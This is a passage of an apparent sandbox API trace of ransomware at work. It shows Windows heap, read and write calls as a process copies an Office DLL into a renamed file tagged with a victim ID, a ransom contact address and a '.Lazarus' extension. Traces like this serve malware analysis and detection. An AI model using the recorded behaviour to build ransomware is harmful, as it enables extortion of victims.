(HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0096.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0096.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0096.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0096.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0096.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0096.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0096.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.406] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0096.406] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0096.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0096.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0096.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0096.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0096.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0096.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0096.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0096.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0096.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0096.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0096.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0096.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0096.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0096.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0096.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0096.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0096.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0096.407] AreFileApisANSI () returned 1 [0096.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0096.407] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c5a8 [0096.407] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d000, cbMultiByte=-1, lpWideCharStr=0x8c5a8, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 78 [0096.407] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808dbb6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x808dbb6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x11fdc400, ftLastWriteTime.dwHighDateTime=0x1d0d7aa, nFileSizeHigh=0x0, nFileSizeLow=0xee60)) returned 1 [0096.407] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0096.408] AreFileApisANSI () returned 1 [0096.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0096.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0096.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0096.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0096.408] GetLastError () returned 0x0 [0096.408] SetLastError (dwErrCode=0x0) [0096.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e378 [0096.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x49ca0 [0096.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0096.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0096.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0096.408] GetLastError () returned 0x0 [0096.408] SetLastError (dwErrCode=0x0) [0096.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0096.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0096.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8a5c8 [0096.408] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0096.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0096.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0096.408] AreFileApisANSI () returned 1 [0096.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a5c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 140 [0096.408] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x118) returned 0x91b70 [0096.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8a5c8, cbMultiByte=-1, lpWideCharStr=0x91b70, cchWideChar=140 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 140 [0096.409] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.622] GetFileType (hFile=0x360) returned 0x1 [0096.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x91b70 | out: hHeap=0x20000) returned 1 [0096.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0096.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0096.622] AreFileApisANSI () returned 1 [0096.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0096.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9c) returned 0x8c458 [0096.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8c458, cchWideChar=78 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll") returned 78 [0096.623] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\msointl30.en-us.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\msointl30.en-us.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.623] GetFileType (hFile=0x418) returned 0x1 [0096.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0096.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a630 [0096.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0096.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0096.623] GetLastError () returned 0x0 [0096.623] SetLastError (dwErrCode=0x0) [0096.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0096.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0096.623] GetLastError () returned 0x0 [0096.623] SetLastError (dwErrCode=0x0) [0096.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0096.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0096.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x954b0 [0096.623] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0096.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0096.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0096.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0096.628] GetLastError () returned 0x0 [0096.628] SetLastError (dwErrCode=0x0) [0096.628] GetLastError () returned 0x0 [0096.628] SetLastError (dwErrCode=0x0) [0096.628] GetLastError () returned 0x0 [0096.628] SetLastError (dwErrCode=0x0) [0096.628] GetLastError () returned 0x0 [0096.628] SetLastError (dwErrCode=0x0) [0096.628] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.629] WriteFile (in: hFile=0x360, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.630] GetLastError () returned 0x0 [0096.630] SetLastError (dwErrCode=0x0) [0096.630] GetLastError () returned 0x0 [0096.630] SetLastError (dwErrCode=0x0) [0096.630] GetLastError () returned 0x0 [0096.630] SetLastError (dwErrCode=0x0) [0096.630] GetLastError () returned 0x0 [0096.630] SetLastError (dwErrCode=0x0) [0096.630] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.630] WriteFile (in: hFile=0x360, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.630] GetLastError () returned 0x0 [0096.631] SetLastError (dwErrCode=0x0) [0096.631] GetLastError () returned 0x0 [0096.631] SetLastError (dwErrCode=0x0) [0096.631] GetLastError () returned 0x0 [0096.631] SetLastError (dwErrCode=0x0) [0096.631] GetLastError () returned 0x0 [0096.631] SetLastError (dwErrCode=0x0) [0096.631] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.631] WriteFile (in: hFile=0x360, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.631] GetLastError () returned 0x0 [0096.631] SetLastError (dwErrCode=0x0) [0096.631] GetLastError () returned 0x0 [0096.632] SetLastError (dwErrCode=0x0) [0096.632] GetLastError () returned 0x0 [0096.632] SetLastError (dwErrCode=0x0) [0096.632] GetLastError () returned 0x0 [0096.632] SetLastError (dwErrCode=0x0) [0096.632] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.632] WriteFile (in: hFile=0x360, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.632] GetLastError () returned 0x0 [0096.632] SetLastError (dwErrCode=0x0) [0096.632] GetLastError () returned 0x0 [0096.632] SetLastError (dwErrCode=0x0) [0096.633] GetLastError () returned 0x0 [0096.633] SetLastError (dwErrCode=0x0) [0096.633] GetLastError () returned 0x0 [0096.633] SetLastError (dwErrCode=0x0) [0096.633] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.633] WriteFile (in: hFile=0x360, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.633] GetLastError () returned 0x0 [0096.633] SetLastError (dwErrCode=0x0) [0096.633] GetLastError () returned 0x0 [0096.633] SetLastError (dwErrCode=0x0) [0096.633] GetLastError () returned 0x0 [0096.633] SetLastError (dwErrCode=0x0) [0096.634] GetLastError () returned 0x0 [0096.634] SetLastError (dwErrCode=0x0) [0096.634] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.634] WriteFile (in: hFile=0x360, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.634] GetLastError () returned 0x0 [0096.634] SetLastError (dwErrCode=0x0) [0096.634] GetLastError () returned 0x0 [0096.634] SetLastError (dwErrCode=0x0) [0096.634] GetLastError () returned 0x0 [0096.634] SetLastError (dwErrCode=0x0) [0096.634] GetLastError () returned 0x0 [0096.635] SetLastError (dwErrCode=0x0) [0096.635] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.635] WriteFile (in: hFile=0x360, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.635] GetLastError () returned 0x0 [0096.635] SetLastError (dwErrCode=0x0) [0096.635] GetLastError () returned 0x0 [0096.635] SetLastError (dwErrCode=0x0) [0096.635] GetLastError () returned 0x0 [0096.635] SetLastError (dwErrCode=0x0) [0096.635] GetLastError () returned 0x0 [0096.635] SetLastError (dwErrCode=0x0) [0096.636] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.636] WriteFile (in: hFile=0x360, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.636] GetLastError () returned 0x0 [0096.636] SetLastError (dwErrCode=0x0) [0096.636] GetLastError () returned 0x0 [0096.636] SetLastError (dwErrCode=0x0) [0096.636] GetLastError () returned 0x0 [0096.636] SetLastError (dwErrCode=0x0) [0096.636] GetLastError () returned 0x0 [0096.636] SetLastError (dwErrCode=0x0) [0096.636] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.637] WriteFile (in: hFile=0x360, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.637] GetLastError () returned 0x0 [0096.637] SetLastError (dwErrCode=0x0) [0096.637] GetLastError () returned 0x0 [0096.637] SetLastError (dwErrCode=0x0) [0096.637] GetLastError () returned 0x0 [0096.637] SetLastError (dwErrCode=0x0) [0096.637] GetLastError () returned 0x0 [0096.637] SetLastError (dwErrCode=0x0) [0096.637] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.637] WriteFile (in: hFile=0x360, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.638] GetLastError () returned 0x0 [0096.638] SetLastError (dwErrCode=0x0) [0096.638] GetLastError () returned 0x0 [0096.638] SetLastError (dwErrCode=0x0) [0096.638] GetLastError () returned 0x0 [0096.638] SetLastError (dwErrCode=0x0) [0096.638] GetLastError () returned 0x0 [0096.638] SetLastError (dwErrCode=0x0) [0096.638] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.638] WriteFile (in: hFile=0x360, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.639] GetLastError () returned 0x0 [0096.639] SetLastError (dwErrCode=0x0) [0096.639] GetLastError () returned 0x0 [0096.639] SetLastError (dwErrCode=0x0) [0096.639] GetLastError () returned 0x0 [0096.639] SetLastError (dwErrCode=0x0) [0096.639] GetLastError () returned 0x0 [0096.639] SetLastError (dwErrCode=0x0) [0096.639] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.639] WriteFile (in: hFile=0x360, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.639] GetLastError () returned 0x0 [0096.639] SetLastError (dwErrCode=0x0) [0096.640] GetLastError () returned 0x0 [0096.640] SetLastError (dwErrCode=0x0) [0096.640] GetLastError () returned 0x0 [0096.640] SetLastError (dwErrCode=0x0) [0096.640] GetLastError () returned 0x0 [0096.640] SetLastError (dwErrCode=0x0) [0096.640] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0096.640] WriteFile (in: hFile=0x360, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.641] GetLastError () returned 0x0 [0096.641] SetLastError (dwErrCode=0x0) [0096.641] GetLastError () returned 0x0 [0096.641] SetLastError (dwErrCode=0x0) [0096.641] GetLastError () returned 0x0 [0096.641] SetLastError (dwErrCode=0x0) [0096.641] GetLastError () returned 0x0 [0096.641] SetLastError (dwErrCode=0x0) [0096.641] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0xe60, lpOverlapped=0x0) returned 1 [0096.641] WriteFile (in: hFile=0x360, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0096.641] GetLastError () returned 0x0 [0096.641] SetLastError (dwErrCode=0x0) [0096.642] GetLastError () returned 0x0 [0096.642] SetLastError (dwErrCode=0x0) [0096.642] GetLastError () returned 0x0 [0096.642] SetLastError (dwErrCode=0x0) [0096.642] ReadFile (in: hFile=0x418, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0096.642] GetLastError () returned 0x0 [0096.642] SetLastError (dwErrCode=0x0) [0096.642] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d510 | out: hHeap=0x20000) returned 1 [0096.642] WriteFile (in: hFile=0x360, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0xe60, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327ef70*=0xe60, lpOverlapped=0x0) returned 1 [0096.642] GetLastError () returned 0x0 [0096.642] SetLastError (dwErrCode=0x0) [0096.642] GetLastError () returned 0x0 [0096.642] SetLastError (dwErrCode=0x0) [0096.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0096.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0096.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0096.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a630 | out: hHeap=0x20000) returned 1 [0096.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0096.643] CloseHandle (hObject=0x360) returned 1 [0096.643] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x954b0 | out: hHeap=0x20000) returned 1 [0096.643] CloseHandle (hObject=0x418) returned 1 [0096.643] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0096.644] RtlAllocateHeap (HeapHandle=0x20000, 